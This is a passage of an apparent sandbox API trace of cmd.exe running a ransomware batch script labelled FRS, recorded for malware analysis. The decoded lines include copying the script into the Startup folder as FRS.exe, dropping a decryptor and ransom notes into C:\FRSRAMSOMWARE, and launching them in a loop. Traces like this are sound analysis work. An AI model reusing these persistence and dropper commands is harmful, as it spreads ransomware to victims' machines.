hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0133.312] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.312] GetFileType (hFile=0x2ec) returned 0x1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0133.312] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0133.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0133.312] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.312] GetFileType (hFile=0x2ec) returned 0x1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0133.312] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0133.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0133.312] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.312] GetFileType (hFile=0x2ec) returned 0x1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0133.312] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0133.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0133.312] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.312] GetFileType (hFile=0x2ec) returned 0x1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0133.312] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0133.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0133.312] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.312] GetFileType (hFile=0x2ec) returned 0x1 [0133.312] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0133.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0133.313] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0133.313] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.313] GetFileType (hFile=0x2ec) returned 0x1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0133.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0133.313] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0133.313] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.313] GetFileType (hFile=0x2ec) returned 0x1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0133.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0133.313] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0133.313] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.313] GetFileType (hFile=0x2ec) returned 0x1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0133.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0133.313] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0133.313] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.313] GetFileType (hFile=0x2ec) returned 0x1 [0133.313] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0133.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0133.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0133.314] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.314] GetFileType (hFile=0x2ec) returned 0x1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0133.314] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0133.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0133.314] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.314] GetFileType (hFile=0x2ec) returned 0x1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0133.314] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0133.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0133.314] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.314] GetFileType (hFile=0x2ec) returned 0x1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0133.314] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0133.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0133.314] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.314] GetFileType (hFile=0x2ec) returned 0x1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0133.314] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0133.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0133.314] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0133.315] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.315] GetFileType (hFile=0x2ec) returned 0x1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0133.315] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0133.315] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0133.315] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.315] GetFileType (hFile=0x2ec) returned 0x1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0133.315] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0133.315] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0133.315] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.315] GetFileType (hFile=0x2ec) returned 0x1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0133.315] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0133.315] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0133.315] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0133.315] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0133.315] _get_osfhandle (_FileHandle=1) returned 0x28 [0133.315] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0133.316] _get_osfhandle (_FileHandle=0) returned 0x24 [0133.316] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0133.316] SetConsoleInputExeNameW () returned 0x1 [0133.316] GetConsoleOutputCP () returned 0x1b5 [0133.316] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0133.316] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.316] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0133.316] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0133.316] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.316] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0133.316] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0133.316] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0133.316] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0133.316] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0133.316] GetFileType (hFile=0x2ec) returned 0x1 [0133.316] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.316] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0133.316] _tell (_FileHandle=3) returned 2512 [0133.317] _close (_FileHandle=3) returned 0 [0133.317] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0133.317] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0133.317] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0133.317] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0133.317] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0133.317] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0133.317] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0133.317] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0133.317] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0133.317] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0133.317] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0133.317] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0133.317] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0133.317] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0133.317] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0133.317] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0133.317] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0133.317] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0133.317] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0133.317] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0133.317] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0133.317] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0133.317] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0133.317] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0133.317] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0133.317] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0133.317] _wcsicmp (_String1="ping", _String2="START") returned -3 [0133.317] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0133.317] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0133.317] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0133.317] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0133.317] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0133.317] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0133.317] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0133.317] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0133.317] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0133.317] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0133.317] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0133.317] SetErrorMode (uMode=0x0) returned 0x0 [0133.317] SetErrorMode (uMode=0x1) returned 0x0 [0133.317] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0133.318] SetErrorMode (uMode=0x0) returned 0x1 [0133.318] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.318] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.318] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0133.318] GetLastError () returned 0x2 [0133.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0133.318] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0133.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0133.318] GetLastError () returned 0x2 [0133.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0133.318] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0133.318] GetFileType (hFile=0x28) returned 0x2 [0133.318] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0133.318] _dup (_FileHandle=1) returned 3 [0133.318] _close (_FileHandle=1) returned 0 [0133.319] _wcsicmp (_String1="nul", _String2="con") returned 11 [0133.319] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, 